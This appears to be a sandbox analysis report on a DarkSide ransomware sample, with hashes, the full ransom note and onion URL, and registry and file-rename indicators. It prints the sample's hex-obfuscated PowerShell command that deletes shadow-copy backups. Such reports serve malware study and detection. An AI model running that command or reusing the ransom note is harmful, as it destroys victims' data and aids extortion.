darkside | bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0

General

Target

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Size

59KB
MD5

c2764be55336f83a59aa0f63a0b36732
SHA1

0bfc26e7a035a143339516b877ac11eefbbeefb5
SHA256

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0
SHA512

9c413793996c48c4c9e092e8c09810712c84dc64288515b64acc7108671071283e8dc4b3d782befd9cbf04bd0db0fb61c8986b429eec5b748722910455d399fa

Score

10^/10

darkside ransomware spyware stealer suricata

Malware Config

Extracted

Path

C:\\README.27a6f0b5.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/FNKSGXL6YM3ZOHUB9WRBMPZDFXUG0DSF5M61SMYGU4V8R8OOJ6AKQ2VF4BGHSE1O When you open our website, put the following data in the input form: Key: gCoPnSlnktkrWjSo2qV2Cux3LTH5Qasj3REEJd8OrQTCBAG5Qg5oIWnuVvmJXiOC87UkymiPDopm1FeU8EBdqWJgIZzXZSdONaVQ5vOE7SRq4wjMeJYchs6sc3wkIBD7f9egxBhkFw7uY1uiaQrtgdKZYDE7da5sPfGrsA4nGvRhgn9ym1ua62zbml9IUOKIsXiiT4N09WagMxlEtp7a5wAqmktBVMhC5rL9M8F3gQzdSxoMwMjsHX6ExWuBjt8uHFxo1GsBgXK3GwKaZJuZKFTbc0YCdCHcUrcLDR0hflakpHBm9uRNU406NXEvRMW22L0iDCb37wNlbsVhIQHeOpcEvMEcHBXJNo08ZchjjApCrCd2dmVDCB9E02QL9nZFLYY2s8bJzXT3DN6X142KteSm0lPAs2Yf2TnjPExPEGY8E2w2D1g4cYpAfkGuzWDgKkHICDls0qhiVLLrP6c7Khrz3tNYkWWhJRcLL4BRdgvlNkcTweAfuYUOlV2zzcVgEMrAp1uBgEj0Bo92NhZ0tUnVvPBqigh7hYXGo8MjnJJYGDocnrC20Ei !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/FNKSGXL6YM3ZOHUB9WRBMPZDFXUG0DSF5M61SMYGU4V8R8OOJ6AKQ2VF4BGHSE1O

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI
suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI
suricata

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\BlockRename.crw => C:\Users\Admin\Pictures\BlockRename.crw.27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
File opened for modification	C:\Users\Admin\Pictures\BlockRename.crw.27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
File renamed	C:\Users\Admin\Pictures\InstallUse.png => C:\Users\Admin\Pictures\InstallUse.png.27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
File opened for modification	C:\Users\Admin\Pictures\InstallUse.png.27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
File renamed	C:\Users\Admin\Pictures\ReceiveExport.png => C:\Users\Admin\Pictures\ReceiveExport.png.27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
File opened for modification	C:\Users\Admin\Pictures\ReceiveExport.png.27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\27a6f0b5.BMP"	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\27a6f0b5.BMP"	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

pid process

732 bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallpaperStyle = "10"	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

Modifies registry class 5 IoCs

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5\ = "27a6f0b5"	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\27a6f0b5.ico"	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exepowershell.exe

pid	process
732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
1548	powershell.exe
732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeSecurityPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeTakeOwnershipPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeLoadDriverPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeSystemProfilePrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeSystemtimePrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeProfSingleProcessPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeIncBasePriorityPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeCreatePagefilePrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeBackupPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeRestorePrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeShutdownPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeDebugPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeSystemEnvironmentPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeRemoteShutdownPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeUndockPrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeManageVolumePrivilege	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: 33	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: 34	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: 35	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeBackupPrivilege	972	vssvc.exe
Token: SeRestorePrivilege	972	vssvc.exe
Token: SeAuditPrivilege	972	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe

description	pid	process	target process
PID 732 wrote to memory of 1548	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe	powershell.exe
PID 732 wrote to memory of 1548	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe	powershell.exe
PID 732 wrote to memory of 1548	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe	powershell.exe
PID 732 wrote to memory of 1548	732	bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe
"C:\Users\Admin\AppData\Local\Temp\bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
e20fb51760527cc6f1a87b3a4acdb8bc

SHA1
9b617856ada67a2f8ce936a04323aac5b8ae310d

SHA256
3ea9b863617c7b9f263d0d929280a70f4a922a97d9237d56905e20a521f07a9e

SHA512
83ac1fbbcf25ed648f3fca346acf7428f8f624010b97ede3ab9baa2d2c188ea3f25ea9133e86eb32d3fc93431cb84a6fe81715f3c7ae9beb89d467c19087de40

Download Submit
memory/732-55-0x00000000763B1000-0x00000000763B3000-memory.dmp

Filesize
8KB

Download
memory/1548-56-0x000007FEFC241000-0x000007FEFC243000-memory.dmp

Filesize
8KB

Download
memory/1548-58-0x00000000028F0000-0x00000000028F2000-memory.dmp

Filesize
8KB

Download
memory/1548-59-0x00000000028F2000-0x00000000028F4000-memory.dmp

Filesize
8KB

Download
memory/1548-60-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1548-57-0x000007FEF29B0000-0x000007FEF350D000-memory.dmp

Filesize
11.4MB

Download
memory/1548-61-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads